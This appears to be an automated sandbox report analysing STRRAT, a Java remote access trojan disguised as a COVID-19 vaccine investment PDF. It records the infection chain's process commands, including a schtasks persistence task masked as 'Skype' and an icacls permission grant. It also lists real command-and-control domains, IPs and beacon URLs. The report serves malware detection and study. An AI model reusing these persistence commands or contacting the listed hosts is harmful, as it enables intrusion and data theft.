Source: java.exe, 00000006.00000002.207991849.0000000014FD0000.00000002.00000001.sdmp, wscript.exe, 0000000A.00000002.220344385.0000000005AB0000.00000002.00000001.sdmp, javaw.exe, 0000000B.00000002.242535927.00000000156C0000.00000002.00000001.sdmp, java.exe, 0000000D.00000002.256904173.0000000015870000.00000002.00000001.sdmp, java.exe, 00000010.00000002.531541742.0000000015FF0000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: java.exe, 00000006.00000002.207991849.0000000014FD0000.00000002.00000001.sdmp, wscript.exe, 0000000A.00000002.220344385.0000000005AB0000.00000002.00000001.sdmp, javaw.exe, 0000000B.00000002.242535927.00000000156C0000.00000002.00000001.sdmp, java.exe, 0000000D.00000002.256904173.0000000015870000.00000002.00000001.sdmp, java.exe, 00000010.00000002.531541742.0000000015FF0000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: java.exe, 00000006.00000002.206791495.0000000000ADB000.00000004.00000020.sdmp, javaw.exe, 0000000B.00000002.236307282.0000000000F08000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: java.exe, 00000006.00000002.207991849.0000000014FD0000.00000002.00000001.sdmp, wscript.exe, 0000000A.00000002.220344385.0000000005AB0000.00000002.00000001.sdmp, javaw.exe, 0000000B.00000002.242535927.00000000156C0000.00000002.00000001.sdmp, java.exe, 0000000D.00000002.256904173.0000000015870000.00000002.00000001.sdmp, java.exe, 00000010.00000002.531541742.0000000015FF0000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe | Memory protected: page read and write | page guard
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\7za.exe 7za.exe x -y -oC:\jar 'C:\Users\user\Desktop\Covid19_Vacine_Investment_Proposals_1st_Quarter2021 pdf.jar'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe java.exe -jar 'C:\Users\user\Desktop\Covid19_Vacine_Investment_Proposals_1st_Quarter2021 pdf.jar' keuqzwqbvn.Mmwwrnygnfl
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe | Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe | Process created: C:\Windows\SysWOW64\wscript.exe wscript C:\Users\user\fukvowbkrs.js
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe' -jar 'C:\Users\user\AppData\Roaming\vmlpusjwhz.txt'
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | Process created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -jar 'C:\Users\user\vmlpusjwhz.txt'
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks /create /sc minute /mo 30 /tn Skype /tr 'C:\Users\user\AppData\Roaming\vmlpusjwhz.txt'
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Process created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -jar 'C:\Users\user\AppData\Roaming\vmlpusjwhz.txt'
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 30 /tn Skype /tr 'C:\Users\user\AppData\Roaming\vmlpusjwhz.txt'
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Process created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -jar 'C:\Users\user\AppData\Roaming\plugins.jar' mp
Source: java.exe, 00000010.00000002.511334653.0000000001070000.00000002.00000001.sdmp, notepad.exe, 00000015.00000002.512497714.0000014F58C60000.00000002.00000001.sdmp | Binary or memory string: Program Manager
Source: java.exe, 00000010.00000002.511334653.0000000001070000.00000002.00000001.sdmp, notepad.exe, 00000015.00000002.512497714.0000014F58C60000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: java.exe, 00000010.00000002.511334653.0000000001070000.00000002.00000001.sdmp, notepad.exe, 00000015.00000002.512497714.0000014F58C60000.00000002.00000001.sdmp | Binary or memory string: Progman
Source: java.exe, 00000010.00000002.511334653.0000000001070000.00000002.00000001.sdmp, notepad.exe, 00000015.00000002.512497714.0000014F58C60000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
            Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exeCode function: 6_2_02770380 cpuid
            Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\JavaSoft\Java Runtime Environment CurrentVersion
            Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\JavaSoft\Java Runtime Environment CurrentVersion
            Source: C:\Windows\System32\notepad.exeQueries volume information: C:\Users\user\AppData\Roaming\vmlpusjwhz.txt VolumeInformation
            Source: C:\Windows\System32\notepad.exeQueries volume information: C:\Users\user\AppData\Roaming\vmlpusjwhz.txt VolumeInformation
            Source: C:\Windows\System32\notepad.exeQueries volume information: C:\Users\user\AppData\Roaming\vmlpusjwhz.txt VolumeInformation
            Source: C:\Windows\System32\notepad.exeQueries volume information: C:\Users\user\AppData\Roaming\vmlpusjwhz.txt VolumeInformation
            Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            Yara detected STRRAT
            Source: Yara match | File source: 00000018.00000002.521334832.000000000A810000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000010.00000002.519763899.0000000004ECD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000010.00000002.517894566.0000000004DCD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000018.00000002.517833863.000000000543D000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000D.00000002.252958465.0000000005427000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000D.00000002.252569519.00000000051C5000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: java.exe PID: 720, type: MEMORY
            Source: Yara match | File source: Process Memory Space: java.exe PID: 4952, type: MEMORY

            Remote Access Functionality:

            Yara detected STRRAT
            Source: Yara match | File source: 00000018.00000002.521334832.000000000A810000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000010.00000002.519763899.0000000004ECD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000010.00000002.517894566.0000000004DCD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000018.00000002.517833863.000000000543D000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000D.00000002.252958465.0000000005427000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000D.00000002.252569519.00000000051C5000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: java.exe PID: 720, type: MEMORY
            Source: Yara match | File source: Process Memory Space: java.exe PID: 4952, type: MEMORY

            Mitre Att&ck Matrix

            Techniques listed per tactic column; the number in parentheses is the count shown next to that technique in the original matrix.

            Initial Access
            • Valid Accounts
            • Default Accounts
            • Domain Accounts
            • Local Accounts
            • Cloud Accounts
            • Replication Through Removable Media
            • External Remote Services

            Execution
            • Command and Scripting Interpreter (2)
            • Scheduled Task/Job (1)
            • Scripting (1)
            • Exploitation for Client Execution (2)
            • Cron
            • Launchd
            • Scheduled Task

            Persistence
            • Startup Items (1)
            • Scheduled Task/Job (1)
            • Registry Run Keys / Startup Folder (221)
            • Services File Permissions Weakness (1)
            • Network Logon Script
            • Rc.common
            • Startup Items

            Privilege Escalation
            • Startup Items (1)
            • Process Injection (12)
            • Scheduled Task/Job (1)
            • Registry Run Keys / Startup Folder (221)
            • Services File Permissions Weakness (1)
            • Rc.common
            • Startup Items

            Defense Evasion
            • Masquerading (1)
            • Virtualization/Sandbox Evasion (1)
            • Disable or Modify Tools (1)
            • Process Injection (12)
            • Scripting (1)
            • Obfuscated Files or Information (1)
            • Services File Permissions Weakness (1)

            Credential Access
            • OS Credential Dumping
            • LSASS Memory
            • Security Account Manager
            • NTDS
            • LSA Secrets
            • Cached Domain Credentials
            • DCSync

            Discovery
            • Query Registry (1)
            • Security Software Discovery (11)
            • Virtualization/Sandbox Evasion (1)
            • Process Discovery (1)
            • Remote System Discovery (1)
            • File and Directory Discovery (1)
            • System Information Discovery (32)

            Lateral Movement
            • Remote Services
            • Remote Desktop Protocol
            • SMB/Windows Admin Shares
            • Distributed Component Object Model
            • SSH
            • VNC
            • Windows Remote Management

            Collection
            • Data from Local System
            • Data from Removable Media
            • Data from Network Shared Drive
            • Input Capture
            • Keylogging
            • GUI Input Capture
            • Web Portal Capture

            Exfiltration
            • Exfiltration Over Other Network Medium
            • Exfiltration Over Bluetooth
            • Automated Exfiltration
            • Scheduled Transfer
            • Data Transfer Size Limits
            • Exfiltration Over C2 Channel
            • Exfiltration Over Alternative Protocol

            Command and Control
            • Web Service (1)
            • Encrypted Channel (2)
            • Non-Standard Port (1)
            • Non-Application Layer Protocol (1)
            • Application Layer Protocol (12)
            • Multiband Communication
            • Commonly Used Port

            Network Effects
            • Eavesdrop on Insecure Network Communication
            • Exploit SS7 to Redirect Phone Calls/SMS
            • Exploit SS7 to Track Device Location
            • SIM Card Swap
            • Manipulate Device Communication
            • Jamming or Denial of Service
            • Rogue Wi-Fi Access Points

            Remote Service Effects
            • Remotely Track Device Without Authorization
            • Remotely Wipe Data Without Authorization
            • Obtain Device Cloud Backups

            Impact
            • Modify System Partition
            • Device Lockout
            • Delete Device Data
            • Carrier Billing Fraud
            • Manipulate App Store Rankings or Ratings
            • Abuse Accessibility Features
            • Data Encrypted for Impact

            Behavior Graph

            Behavior Graph ID: 356987
            Sample: Covid19_Vacine_Investment_P...
            Startdate: 23/02/2021
            Architecture: WINDOWS
            Score: 80

            The graph is rendered as an image on the original page; its nodes and edges, with the graph's own node numbers, are:

            2 (sample start)
              signatures: Yara detected STRRAT (89); Connects to a pastebin service (likely for C&C) (91); Uses dynamic DNS services (93); 3 other signatures (95)
              DNS/IP: strizzz100.duckdns.org (74)
              started: cmd.exe (12); cmd.exe (14); notepad.exe (16); 5 other processes (18)
            12 cmd.exe
              started: java.exe (20); conhost.exe (23)
            14 cmd.exe
              started: java.exe (25); 7za.exe (29); conhost.exe (31)
            20 java.exe
              signatures: Exploit detected, runtime environment starts unknown processes (97)
              started: wscript.exe (33); icacls.exe (35)
            25 java.exe
              DNS/IP: pluginserver.duckdns.org 23.239.31.129, 54557 LINODE-APLinodeLLCUS United States (83); str-master.pw (85); 2 other IPs or domains (87)
              dropped: C:\Users\user\...\jna8178706811767784369.dll, PE32 (64)
              signatures: Creates autostart registry keys to launch java (99); Creates multiple autostart registry keys (101)
              started: conhost.exe (37)
            33 wscript.exe
              started: javaw.exe (39)
            35 icacls.exe
              started: conhost.exe (42)
            39 javaw.exe
              DNS/IP: sonatype.map.fastly.net 199.232.192.209, 443, 49718, 49719 FASTLYUS United States (76); github.com 140.82.121.3, 443, 49721 GITHUBUS United States (79); 3 other IPs or domains (81)
              started: java.exe (44)
            76 sonatype.map.fastly.net
              signatures: Uses dynamic DNS services (103)
            44 java.exe
              dropped: C:\Users\user\AppData\...\vmlpusjwhz.txt, Zip (66); C:\Users\user\...\jna7235467147341798336.dll, PE32 (68)
              signatures: Creates multiple autostart registry keys (105)
              started: java.exe (48); cmd.exe (52); conhost.exe (54)
            48 java.exe
              DNS/IP: strizzz100.duckdns.org 107.175.144.243, 1071, 4040 AS-COLOCROSSINGUS United States (70); str-master.pw (72)
              dropped: C:\Users\user\AppData\Roaming\plugins.jar, Zip (60); C:\Users\user\...\jna6181350368483245817.dll, PE32 (62)
            52 cmd.exe
              started: conhost.exe (56); schtasks.exe (58)

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            No Antivirus matches

            Dropped Files

            Source | Detection | Scanner
            C:\Users\user\AppData\Local\Temp\jna-99048687\jna6181350368483245817.dll | 3% | Metadefender
            C:\Users\user\AppData\Local\Temp\jna-99048687\jna6181350368483245817.dll | 0% | ReversingLabs
            C:\Users\user\AppData\Local\Temp\jna-99048687\jna7235467147341798336.dll | 3% | Metadefender
            C:\Users\user\AppData\Local\Temp\jna-99048687\jna7235467147341798336.dll | 0% | ReversingLabs
            C:\Users\user\AppData\Local\Temp\jna-99048687\jna8178706811767784369.dll | 3% | Metadefender
            C:\Users\user\AppData\Local\Temp\jna-99048687\jna8178706811767784369.dll | 0% | ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            Source | Detection | Scanner | Label
            http://crl.xrampsecurity.com/XGCA.crl | 0% | URL Reputation | safe
            http://crl.chambersign.org/chambersroot.crl0 | 0% | URL Reputation | safe
            http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0 | 0% | URL Reputation | safe
            http://www.certplus.com/CRL/class2.crl | 0% | URL Reputation | safe
            http://bugreport.sun.com/bugreport/ | 0% | Avira URL Cloud | safe
            http://cps.chambersign.org/cps/chambersroot.html0 | 0% | URL Reputation | safe
            http://www.chambersign.org1 | 0% | URL Reputation | safe
            https://github-releases.githubusercontent.com/51361554/623ef000-9da4-11e9-9ea2-d90155318994?X-Amz-Al | 0% | Avira URL Cloud | safe
            http://str-master.pw/strigoi/server/ping.php | 0% | Avira URL Cloud | safe
            http://jbfrost.live/strigoi/server/?hwid=1&lid=m&ht=5 | 0% | Avira URL Cloud | safe
            http://ops.com.pa/jre7.zip | 0% | Avira URL Cloud | safe
            https://ocsp.quovadisoffshore.com | 0% | URL Reputation | safe
            http://crl.securetrust.com/STCA.crl0 | 0% | URL Reputation | safe
            http://str-master.pw/strigoi/server/ping.php?lid= | 0% | Avira URL Cloud | safe
            http://cps.chambersign.org/cps/chambersroot.html | 0% | URL Reputation | safe
            http://www.certplus.com/CRL/class3P.crl | 0% | URL Reputation | safe
            http://www.certplus.com/CRL/class3P.crl0 | 0% | URL Reputation | safe
            http://crl.securetrust.com/STCA.crl | 0% | URL Reputation | safe
            http://str-master.pw/strigoi/server/ping.php? | 0% | Avira URL Cloud | safe
            http://www.certplus.com/CRL/class2.crl0 | 0% | URL Reputation | safe
            http://crl.xrampsecurity.com/XGCA.crl0 | 0% | URL Reputation | safe
            http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl | 0% | URL Reputation | safe
            http://www.quovadis.bm | 0% | URL Reputation | safe
            http://www.quovadis.bm0 | 0% | URL Reputation | safe
            https://ocsp.quovadisoffshore.com0 | 0% | URL Reputation | safe
            http://www.allatori.com | 0% | URL Reputation | safe
            http://crl.chambersign.org/chambersroot.crlC5 | 0% | Avira URL Cloud | safe
            http://str-master.pw | 0% | Avira URL Cloud | safe
            http://crl.chambersign.org/chambersroot.crl | 0% | URL Reputation | safe
            http://www.chambersign.org | 0% | URL Reputation | safe
            http://policy.camerfirma.com0 | 0% | URL Reputation | safe
            http://str-master.pw/strigoi/server/ping.php?lid=RUGR-ATSN-D14P-VBXX-49LW | 0% | Avira URL Cloud | safe

            Domains and IPs

            Contacted Domains

            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            pluginserver.duckdns.org | 23.239.31.129 | true | true | | unknown
            sonatype.map.fastly.net | 199.232.192.209 | true | false | | unknown
            github.com | 140.82.121.3 | true | false | | high
            strizzz100.duckdns.org | 107.175.144.243 | true | true | | unknown
            github-releases.githubusercontent.com | 185.199.108.154 | true | false | | unknown
            pastebin.com | 104.23.99.190 | true | false | | high
            str-master.pw | unknown | unknown | true | | unknown
            repo1.maven.org | unknown | unknown | false | | high
            jbfrost.live | unknown | unknown | true | | unknown

                              URLs from Memory and Binaries

            Name | Source | Malicious | Antivirus Detection | Reputation
            http://crl.xrampsecurity.com/XGCA.crl | javaw.exe, 0000000B.00000002.239749123.000000000A126000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253571843.000000000A727000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
            https://repo1.maven.org/maven2/net/java/dev/jna/jna-platform/5.5.0/jna-platform-5.5.0.jar | javaw.exe, 0000000B.00000002.238456779.0000000009F50000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253150120.000000000A550000.00000004.00000001.sdmp, java.exe, 00000010.00000002.520395442.0000000009F50000.00000004.00000001.sdmp | false | | high
            http://crl.chambersign.org/chambersroot.crl0 | javaw.exe, 0000000B.00000002.239749123.000000000A126000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253093640.00000000054CE000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
            http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0 | javaw.exe, 0000000B.00000002.242664932.000000001582F000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253093640.00000000054CE000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
            http://www.apache.org/licenses/LICENSE-2.0.txt | java.exe, 0000000D.00000003.248758362.0000000015676000.00000004.00000001.sdmp, java.exe, 00000010.00000003.277137784.0000000014FD2000.00000004.00000001.sdmp | false | | high
            http://www.apache.org/licenses/ | javaw.exe, 0000000B.00000002.240871910.000000000A2CE000.00000004.00000001.sdmp | false | | high
            http://www.certplus.com/CRL/class2.crl | java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
            http://bugreport.sun.com/bugreport/ | java.exe, 0000000D.00000002.252198805.0000000005052000.00000004.00000001.sdmp, java.exe, 00000010.00000002.520685745.0000000009F96000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
            http://cps.chambersign.org/cps/chambersroot.html0 | javaw.exe, 0000000B.00000002.239749123.000000000A126000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253093640.00000000054CE000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
            http://java.oracle.com/ | java.exe, 00000006.00000002.207053367.0000000004800000.00000004.00000001.sdmp, javaw.exe, 0000000B.00000002.238616990.0000000009FA2000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253246566.000000000A5A2000.00000004.00000001.sdmp, java.exe, 00000010.00000002.520749260.0000000009FA0000.00000004.00000001.sdmp | false | | high
            http://null.oracle.com/ | javaw.exe, 0000000B.00000003.228995438.00000000150EA000.00000004.00000001.sdmp, javaw.exe, 0000000B.00000002.239181413.000000000A03C000.00000004.00000001.sdmp, java.exe, 0000000D.00000003.248758362.0000000015676000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253348649.000000000A630000.00000004.00000001.sdmp, java.exe, 00000010.00000003.277137784.0000000014FD2000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521112026.000000000A02F000.00000004.00000001.sdmp | false | | high
            http://www.chambersign.org1 | javaw.exe, 0000000B.00000002.239749123.000000000A126000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253093640.00000000054CE000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
            https://github-releases.githubusercontent.com/51361554/623ef000-9da4-11e9-9ea2-d90155318994?X-Amz-Al | javaw.exe, 0000000B.00000002.240730122.000000000A276000.00000004.00000001.sdmp, javaw.exe, 0000000B.00000002.238157882.0000000004EA7000.00000004.00000001.sdmp, javaw.exe, 0000000B.00000002.240964215.000000000A300000.00000004.00000001.sdmp, javaw.exe, 0000000B.00000002.240871910.000000000A2CE000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
            http://str-master.pw/strigoi/server/ping.php | java.exe, 00000010.00000002.517809140.0000000004DC1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
            http://repository.swisssign.com/0 | javaw.exe, 0000000B.00000002.239749123.000000000A126000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253093640.00000000054CE000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmp | false | | high
            https://repo1.maven.org/maven2/net/java/dev/jna/jna/5.5.0/jna-5.5.0.jar | javaw.exe, 0000000B.00000002.238456779.0000000009F50000.00000004.00000001.sdmp, javaw.exe, 0000000B.00000002.238481797.0000000009F6E000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253150120.000000000A550000.00000004.00000001.sdmp, java.exe, 00000010.00000002.520395442.0000000009F50000.00000004.00000001.sdmp | false | | high
            http://jbfrost.live/strigoi/server/?hwid=1&lid=m&ht=5 | java.exe, 00000010.00000002.515417464.0000000004BAB000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
            http://policy.camerfirma.com | java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmp | false | | high
            http://ops.com.pa/jre7.zip | wscript.exe, 0000000A.00000003.214763026.0000000004F0D000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
            https://ocsp.quovadisoffshore.com | java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
            https://repo1.maven.org/maven2/org/xerial/sqlite-jdbc/3.14.2.1/sqlite-jdbc-3.14.2.1.jar | javaw.exe, 0000000B.00000002.238456779.0000000009F50000.00000004.00000001.sdmp, javaw.exe, 0000000B.00000002.237181358.0000000004A90000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253150120.000000000A550000.00000004.00000001.sdmp, java.exe, 00000010.00000002.520395442.0000000009F50000.00000004.00000001.sdmp | false | | high
            http://crl.securetrust.com/STCA.crl0 | javaw.exe, 0000000B.00000002.239749123.000000000A126000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253093640.00000000054CE000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
            http://str-master.pw/strigoi/server/ping.php?lid= | java.exe, 00000010.00000002.517809140.0000000004DC1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
            http://www.quovadisglobal.com/cps | java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmp | false | | high
            http://cps.chambersign.org/cps/chambersroot.html | java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
            http://www.certplus.com/CRL/class3P.crl | java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
            http://www.certplus.com/CRL/class3P.crl0 | javaw.exe, 0000000B.00000002.239749123.000000000A126000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253093640.00000000054CE000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
            http://crl.securetrust.com/STCA.crl | java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
            http://str-master.pw/strigoi/server/ping.php? | java.exe, 00000010.00000002.517894566.0000000004DCD000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
            http://www.certplus.com/CRL/class2.crl0 | javaw.exe, 0000000B.00000002.242664932.000000001582F000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253093640.00000000054CE000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
            http://www.quovadisglobal.com/cps0 | javaw.exe, 0000000B.00000002.239749123.000000000A126000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253093640.00000000054CE000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmp | false | | high
            http://crl.xrampsecurity.com/XGCA.crl0 | javaw.exe, 0000000B.00000002.239749123.000000000A126000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253093640.00000000054CE000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
            http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl | java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
            http://www.quovadis.bm | javaw.exe, 0000000B.00000002.239749123.000000000A126000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253571843.000000000A727000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
            http://www.quovadis.bm0 | javaw.exe, 0000000B.00000002.239749123.000000000A126000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253093640.00000000054CE000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
            https://ocsp.quovadisoffshore.com0 | javaw.exe, 0000000B.00000002.239749123.000000000A126000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253093640.00000000054CE000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmp | false
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.allatori.comjavaw.exe, 0000000B.00000002.238594494.0000000009FA0000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253231810.000000000A5A0000.00000004.00000001.sdmp, java.exe, 00000010.00000002.520726996.0000000009F9E000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://crl.chambersign.org/chambersroot.crlC5java.exe, 0000000D.00000002.253093640.00000000054CE000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://str-master.pwjava.exe, 00000010.00000002.517894566.0000000004DCD000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://crl.chambersign.org/chambersroot.crljava.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://repository.swisssign.com/java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmpfalse
                                                      high
                                                      http://www.chambersign.orgjavaw.exe, 0000000B.00000002.240871910.000000000A2CE000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253571843.000000000A727000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://api.github.com/_private/browser/errorsjavaw.exe, 0000000B.00000002.238157882.0000000004EA7000.00000004.00000001.sdmpfalse
                                                        high
                                                        https://github.com/kristian/system-hook/releases/download/3.5/system-hook-3.5.jarjavaw.exe, 0000000B.00000002.238456779.0000000009F50000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253150120.000000000A550000.00000004.00000001.sdmp, java.exe, 00000010.00000002.520395442.0000000009F50000.00000004.00000001.sdmpfalse
                                                          high
                                                          http://policy.camerfirma.com0javaw.exe, 0000000B.00000002.239749123.000000000A126000.00000004.00000001.sdmp, java.exe, 0000000D.00000002.253093640.00000000054CE000.00000004.00000001.sdmp, java.exe, 00000010.00000002.521484537.000000000A126000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://str-master.pw/strigoi/server/ping.php?lid=RUGR-ATSN-D14P-VBXX-49LWjava.exe, 00000010.00000002.517894566.0000000004DCD000.00000004.00000001.sdmp, java.exe, 00000010.00000002.517809140.0000000004DC1000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown

                                                          Contacted IPs

                                                          Public

IP | Domain | Country | ASN | ASN Name | Malicious
104.23.99.190 | unknown | United States | 13335 | CLOUDFLARENETUS | false
23.239.31.129 | unknown | United States | 63949 | LINODE-APLinodeLLCUS | true
199.232.192.209 | unknown | United States | 54113 | FASTLYUS | false
185.199.108.154 | unknown | Netherlands | 54113 | FASTLYUS | false
140.82.121.3 | unknown | United States | 36459 | GITHUBUS | false
107.175.144.243 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true

                                                          Private

                                                          IP
                                                          192.168.2.1

                                                          General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 356987
Start date: 23.02.2021
Start time: 21:03:24
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 14m 37s
Hypervisor based Inspection enabled: false
Report type: light
